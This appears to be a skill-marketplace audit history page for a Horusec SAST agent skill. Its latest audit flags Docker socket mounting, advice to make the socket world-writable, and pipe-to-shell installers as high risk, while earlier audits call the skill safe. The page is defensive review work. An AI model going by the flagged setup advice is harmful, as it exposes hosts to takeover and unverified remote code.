スキル sast-horusec 監査履歴
📦

監査履歴

sast-horusec - 6 監査

監査バージョン 6

最新 高リスク

Jun 28, 2026, 06:08 AM

Static analysis flagged many command, network, environment, filesystem, and script patterns. Most findings are documentation examples or legitimate SAST workflow guidance, but the Docker socket mount, world-writable Docker socket advice, and pipe-to-shell installers are confirmed high-risk operational patterns. No evidence found of prompt injection or confirmed malicious intent, so the skill is not blocked but should not publish without revisions.

5
スキャンされたファイル
1,876
解析された行数
13
検出結果
codex
監査者

高リスクの問題 (3)

SKILL.md:37-40SKILL.md:213-215
Docker Socket Mounted Into Scanner Container
TRUE_POSITIVE: The skill recommends running Horusec with /var/run/docker.sock mounted into the container. Docker socket access can give a container control over the host Docker daemon, which is a high-impact privilege boundary risk even when used for legitimate scanning.
SKILL.md:252-257
World-Writable Docker Socket Permission Advice
TRUE_POSITIVE: The troubleshooting section advises chmod 666 on /var/run/docker.sock. This grants local users broad access to the Docker daemon and can enable host compromise through container creation.
SKILL.md:293-298assets/ci-config-template.yml:237-240
Pipe-To-Shell Installer Commands
TRUE_POSITIVE: The skill and CI template include commands that download remote shell scripts and pipe them directly to bash. This creates supply-chain risk because the executed content is not pinned, verified, or reviewed before execution.
中リスクの問題 (2)
SKILL.md:47-56SKILL.md:144-157SKILL.md:230-235
Extensive Shell Execution Guidance
NEEDS_REVIEW: The skill is designed to run security scanners, Docker commands, package installers, and report-processing commands. This is expected for a Horusec workflow, but users could run commands against sensitive repositories or CI systems without sandboxing.
assets/ci-config-template.yml:161-164assets/ci-config-template.yml:317-323
CI Token And Repository Automation Exposure
NEEDS_REVIEW: The CI template uses a GitHub token for Gitleaks and reads a generated report before posting a pull request comment. These are legitimate GitHub Actions patterns, but they require least-privilege permissions and careful artifact handling.
低リスクの問題 (3)
assets/rule-template.yaml:132-165references/EXAMPLE.md:135-138references/EXAMPLE.md:272-276
Intentional Vulnerable Code Examples
FALSE_POSITIVE: The hardcoded secrets, weak cryptography, XSS, C2, and reconnaissance terms appear inside security-rule templates or reference examples. They document what a scanner should detect rather than implementing malicious behavior.
SKILL.md:19-20assets/rule-template.yaml:43-45
Documentation URLs And Reference Links
FALSE_POSITIVE: Hardcoded URLs point to Horusec documentation, OWASP, CWE, and security tooling references. These are normal documentation links and do not by themselves indicate data exfiltration.
assets/ci-config-template.yml:161-164references/EXAMPLE.md:422-437
Environment Variable Examples Are Mostly Defensive
FALSE_POSITIVE: Environment variable references are used for GitHub Actions secrets or examples showing how to avoid hardcoded credentials. This is safer than embedding secrets directly, but users should still protect scan results.

リスク要因

⚙️ 外部コマンド (6)
SKILL.md:37-40 SKILL.md:213-215 SKILL.md:256-257 SKILL.md:298 assets/ci-config-template.yml:240 references/WORKFLOW_CHECKLIST.md:74
🌐 ネットワークアクセス (4)
SKILL.md:19-20 SKILL.md:298 assets/ci-config-template.yml:240 assets/rule-template.yaml:43-45
📁 ファイルシステムへのアクセス (1)
assets/ci-config-template.yml:323
🔑 環境変数 (3)
assets/ci-config-template.yml:164 assets/rule-template.yaml:147-148 references/EXAMPLE.md:423-437
⚡ スクリプトを含む (1)
references/EXAMPLE.md:137-138

検出されたパターン

Privileged Docker Socket Bind MountWorld-Writable Docker SocketRemote Installer Piped To Bash

監査バージョン 5

安全

Jan 16, 2026, 04:03 PM

Documentation-only skill containing no executable code. All static findings are false positives - patterns detected are legitimate documentation examples showing vulnerable code patterns that Horusec scanner is designed to detect. Docker socket references and command examples are for running Horusec CLI tool, not for malicious purposes. All URLs point to legitimate security resources (Horusec, OWASP, CWE).

6
スキャンされたファイル
2,097
解析された行数
5
検出結果
claude
監査者
セキュリティ問題は見つかりませんでした

リスク要因

⚙️ 外部コマンド (99)
assets/ci-config-template.yml:298 assets/ci-config-template.yml:301 assets/ci-config-template.yml:304 assets/ci-config-template.yml:307 assets/ci-config-template.yml:310 assets/ci-config-template.yml:134 assets/ci-config-template.yml:250 assets/ci-config-template.yml:291 references/EXAMPLE.md:54-74 references/EXAMPLE.md:74-95 references/EXAMPLE.md:95-108 references/EXAMPLE.md:108-111 references/EXAMPLE.md:111-118 references/EXAMPLE.md:118-122 references/EXAMPLE.md:122-129 references/EXAMPLE.md:129-135 references/EXAMPLE.md:135-151 references/EXAMPLE.md:151-154 references/EXAMPLE.md:154-162 references/EXAMPLE.md:162-296 references/EXAMPLE.md:296-306 references/EXAMPLE.md:306-309 references/EXAMPLE.md:309-318 references/EXAMPLE.md:318-333 references/EXAMPLE.md:333-342 references/EXAMPLE.md:342-346 references/EXAMPLE.md:346-354 references/EXAMPLE.md:354-358 references/EXAMPLE.md:358-361 references/EXAMPLE.md:361-371 references/EXAMPLE.md:371-404 references/EXAMPLE.md:404-414 references/EXAMPLE.md:414-447 references/EXAMPLE.md:447-451 references/EXAMPLE.md:451-472 references/EXAMPLE.md:472-476 references/EXAMPLE.md:476-537 references/WORKFLOW_CHECKLIST.md:74 SKILL.md:37-44 SKILL.md:44-54 SKILL.md:54-56 SKILL.md:56-80 SKILL.md:80-82 SKILL.md:82-85 SKILL.md:85 SKILL.md:85-94 SKILL.md:94-96 SKILL.md:96-98 SKILL.md:98-99 SKILL.md:99-104 SKILL.md:104-111 SKILL.md:111-113 SKILL.md:113-144 SKILL.md:144-150 SKILL.md:150-151 SKILL.md:151-152 SKILL.md:152-154 SKILL.md:154-155 SKILL.md:155-157 SKILL.md:157-165 SKILL.md:165-169 SKILL.md:169-177 SKILL.md:177-182 SKILL.md:182-189 SKILL.md:189-190 SKILL.md:190-194 SKILL.md:194-210 SKILL.md:210-217 SKILL.md:217-220 SKILL.md:220-228 SKILL.md:228-231 SKILL.md:231-237 SKILL.md:237-255 SKILL.md:255-258 SKILL.md:258-263 SKILL.md:263-267 SKILL.md:267-272 SKILL.md:272-277 SKILL.md:277-282 SKILL.md:282-285 SKILL.md:285-293 SKILL.md:293-302 SKILL.md:302-305 SKILL.md:305-307 SKILL.md:307-315 SKILL.md:315-321 SKILL.md:321-327 SKILL.md:327-334 SKILL.md:334-340 SKILL.md:340-349 SKILL.md:40 SKILL.md:40 SKILL.md:214 SKILL.md:234 SKILL.md:37-44 SKILL.md:210-217 SKILL.md:231-237 SKILL.md:256 SKILL.md:257
🌐 ネットワークアクセス (22)
assets/ci-config-template.yml:240 assets/rule-template.yaml:43 assets/rule-template.yaml:44 assets/rule-template.yaml:45 assets/rule-template.yaml:73 assets/rule-template.yaml:118 assets/rule-template.yaml:119 assets/rule-template.yaml:151 assets/rule-template.yaml:191 assets/rule-template.yaml:192 assets/rule-template.yaml:193 assets/rule-template.yaml:217 assets/rule-template.yaml:260 assets/rule-template.yaml:261 assets/rule-template.yaml:288 SKILL.md:19 SKILL.md:20 SKILL.md:298 SKILL.md:353 SKILL.md:354 SKILL.md:355 SKILL.md:356
📁 ファイルシステムへのアクセス (2)
assets/ci-config-template.yml:323 assets/ci-config-template.yml:323
🔑 環境変数 (27)
assets/ci-config-template.yml:164 assets/ci-config-template.yml:164 assets/rule-template.yaml:148 assets/rule-template.yaml:148 assets/rule-template.yaml:147 assets/rule-template.yaml:162 assets/rule-template.yaml:132 assets/rule-template.yaml:147 assets/rule-template.yaml:148 assets/rule-template.yaml:156 assets/rule-template.yaml:157 assets/rule-template.yaml:162 assets/rule-template.yaml:162 assets/rule-template.yaml:163 assets/rule-template.yaml:164 assets/rule-template.yaml:165 references/EXAMPLE.md:423 references/EXAMPLE.md:423 references/EXAMPLE.md:423 references/EXAMPLE.md:424 references/EXAMPLE.md:425 references/EXAMPLE.md:427 references/EXAMPLE.md:430 references/EXAMPLE.md:432 references/EXAMPLE.md:437 references/EXAMPLE.md:437 references/EXAMPLE.md:444
⚡ スクリプトを含む (2)
references/EXAMPLE.md:138 references/EXAMPLE.md:137

監査バージョン 4

安全

Jan 16, 2026, 04:03 PM

Documentation-only skill containing no executable code. All static findings are false positives - patterns detected are legitimate documentation examples showing vulnerable code patterns that Horusec scanner is designed to detect. Docker socket references and command examples are for running Horusec CLI tool, not for malicious purposes. All URLs point to legitimate security resources (Horusec, OWASP, CWE).

6
スキャンされたファイル
2,097
解析された行数
5
検出結果
claude
監査者
セキュリティ問題は見つかりませんでした

リスク要因

⚙️ 外部コマンド (99)
assets/ci-config-template.yml:298 assets/ci-config-template.yml:301 assets/ci-config-template.yml:304 assets/ci-config-template.yml:307 assets/ci-config-template.yml:310 assets/ci-config-template.yml:134 assets/ci-config-template.yml:250 assets/ci-config-template.yml:291 references/EXAMPLE.md:54-74 references/EXAMPLE.md:74-95 references/EXAMPLE.md:95-108 references/EXAMPLE.md:108-111 references/EXAMPLE.md:111-118 references/EXAMPLE.md:118-122 references/EXAMPLE.md:122-129 references/EXAMPLE.md:129-135 references/EXAMPLE.md:135-151 references/EXAMPLE.md:151-154 references/EXAMPLE.md:154-162 references/EXAMPLE.md:162-296 references/EXAMPLE.md:296-306 references/EXAMPLE.md:306-309 references/EXAMPLE.md:309-318 references/EXAMPLE.md:318-333 references/EXAMPLE.md:333-342 references/EXAMPLE.md:342-346 references/EXAMPLE.md:346-354 references/EXAMPLE.md:354-358 references/EXAMPLE.md:358-361 references/EXAMPLE.md:361-371 references/EXAMPLE.md:371-404 references/EXAMPLE.md:404-414 references/EXAMPLE.md:414-447 references/EXAMPLE.md:447-451 references/EXAMPLE.md:451-472 references/EXAMPLE.md:472-476 references/EXAMPLE.md:476-537 references/WORKFLOW_CHECKLIST.md:74 SKILL.md:37-44 SKILL.md:44-54 SKILL.md:54-56 SKILL.md:56-80 SKILL.md:80-82 SKILL.md:82-85 SKILL.md:85 SKILL.md:85-94 SKILL.md:94-96 SKILL.md:96-98 SKILL.md:98-99 SKILL.md:99-104 SKILL.md:104-111 SKILL.md:111-113 SKILL.md:113-144 SKILL.md:144-150 SKILL.md:150-151 SKILL.md:151-152 SKILL.md:152-154 SKILL.md:154-155 SKILL.md:155-157 SKILL.md:157-165 SKILL.md:165-169 SKILL.md:169-177 SKILL.md:177-182 SKILL.md:182-189 SKILL.md:189-190 SKILL.md:190-194 SKILL.md:194-210 SKILL.md:210-217 SKILL.md:217-220 SKILL.md:220-228 SKILL.md:228-231 SKILL.md:231-237 SKILL.md:237-255 SKILL.md:255-258 SKILL.md:258-263 SKILL.md:263-267 SKILL.md:267-272 SKILL.md:272-277 SKILL.md:277-282 SKILL.md:282-285 SKILL.md:285-293 SKILL.md:293-302 SKILL.md:302-305 SKILL.md:305-307 SKILL.md:307-315 SKILL.md:315-321 SKILL.md:321-327 SKILL.md:327-334 SKILL.md:334-340 SKILL.md:340-349 SKILL.md:40 SKILL.md:40 SKILL.md:214 SKILL.md:234 SKILL.md:37-44 SKILL.md:210-217 SKILL.md:231-237 SKILL.md:256 SKILL.md:257
🌐 ネットワークアクセス (22)
assets/ci-config-template.yml:240 assets/rule-template.yaml:43 assets/rule-template.yaml:44 assets/rule-template.yaml:45 assets/rule-template.yaml:73 assets/rule-template.yaml:118 assets/rule-template.yaml:119 assets/rule-template.yaml:151 assets/rule-template.yaml:191 assets/rule-template.yaml:192 assets/rule-template.yaml:193 assets/rule-template.yaml:217 assets/rule-template.yaml:260 assets/rule-template.yaml:261 assets/rule-template.yaml:288 SKILL.md:19 SKILL.md:20 SKILL.md:298 SKILL.md:353 SKILL.md:354 SKILL.md:355 SKILL.md:356
📁 ファイルシステムへのアクセス (2)
assets/ci-config-template.yml:323 assets/ci-config-template.yml:323
🔑 環境変数 (27)
assets/ci-config-template.yml:164 assets/ci-config-template.yml:164 assets/rule-template.yaml:148 assets/rule-template.yaml:148 assets/rule-template.yaml:147 assets/rule-template.yaml:162 assets/rule-template.yaml:132 assets/rule-template.yaml:147 assets/rule-template.yaml:148 assets/rule-template.yaml:156 assets/rule-template.yaml:157 assets/rule-template.yaml:162 assets/rule-template.yaml:162 assets/rule-template.yaml:163 assets/rule-template.yaml:164 assets/rule-template.yaml:165 references/EXAMPLE.md:423 references/EXAMPLE.md:423 references/EXAMPLE.md:423 references/EXAMPLE.md:424 references/EXAMPLE.md:425 references/EXAMPLE.md:427 references/EXAMPLE.md:430 references/EXAMPLE.md:432 references/EXAMPLE.md:437 references/EXAMPLE.md:437 references/EXAMPLE.md:444
⚡ スクリプトを含む (2)
references/EXAMPLE.md:138 references/EXAMPLE.md:137

監査バージョン 3

安全

Jan 10, 2026, 10:57 AM

This skill contains only documentation and configuration templates. No executable scripts, no network calls, and no direct filesystem access. The skill guides users on how to use the Horusec CLI tool which they install separately. Pure documentation-based skill with no code execution capabilities.

5
スキャンされたファイル
1,876
解析された行数
0
検出結果
claude
監査者
セキュリティ問題は見つかりませんでした

監査バージョン 2

安全

Jan 10, 2026, 10:57 AM

This skill contains only documentation and configuration templates. No executable scripts, no network calls, and no direct filesystem access. The skill guides users on how to use the Horusec CLI tool which they install separately. Pure documentation-based skill with no code execution capabilities.

5
スキャンされたファイル
1,876
解析された行数
0
検出結果
claude
監査者
セキュリティ問題は見つかりませんでした

監査バージョン 1

安全

Jan 10, 2026, 10:57 AM

This skill contains only documentation and configuration templates. No executable scripts, no network calls, and no direct filesystem access. The skill guides users on how to use the Horusec CLI tool which they install separately. Pure documentation-based skill with no code execution capabilities.

5
スキャンされたファイル
1,876
解析された行数
0
検出結果
claude
監査者
セキュリティ問題は見つかりませんでした
← スキルに戻る